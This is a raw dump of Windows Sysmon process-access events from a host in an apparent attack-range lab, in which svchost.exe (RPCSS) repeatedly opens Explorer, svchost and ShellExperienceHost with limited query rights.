14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.831{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.831{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.831{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.831{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
